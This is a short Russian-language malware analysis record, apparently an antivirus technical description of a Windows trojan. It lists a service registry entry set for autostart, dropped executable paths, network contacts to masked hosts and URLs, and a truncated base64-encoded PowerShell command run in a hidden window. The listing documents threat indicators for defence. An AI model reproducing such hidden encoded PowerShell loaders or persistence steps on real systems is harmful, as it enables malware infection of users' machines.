Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\MPG4DECD] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\MPG4DECD] 'ImagePath' = '"%WINDIR%\SysWOW64\mfc120ita\MPG4DECD.exe"'
- 'MPG4DECD' "%WINDIR%\SysWOW64\mfc120ita\MPG4DECD.exe"
- 'MPG4DECD' %WINDIR%\SysWOW64\mfc120ita\MPG4DECD.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGADIAZAByADQAdAB0AD0AKAAoACcAUgBwADQAJwArACcAdwA1ACcAKQArACcAbwAnACsAJwBiACcAKQA7ACQARABjADMAeQBnAHgAbgA9ACQARgB3AGkANQAzAGkAdQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- %HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe
- %WINDIR%\syswow64\mfc120ita\mpg4decd.exe
- %HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe в %WINDIR%\syswow64\mfc120ita\mpg4decd.exe
- '22#.#47.142.214':80
- http://th####seofpeace.org/cgi-bin/NZdfyylt/
- http://22#.#47.142.214/idAnr6Pq76vgFnFN5o/dMrxrnOnf60dsmOjns/vmp8ofNg/
- DNS ASK th####seofpeace.org
- '%HOMEPATH%\bh2dez5\obl3adb\rmrfi2g4_.exe'
- '%WINDIR%\syswow64\mfc120ita\mpg4decd.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABGADIAZAByADQAdAB0AD0AKAAoACcAUgBwADQAJwArACcAdwA1ACcAKQArACcAbwAnACsAJwBiACcAKQA7ACQARABjADMAeQBnAHgAbgA9ACQARgB3AGkANQAzAGkAdQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (со скрытым окном)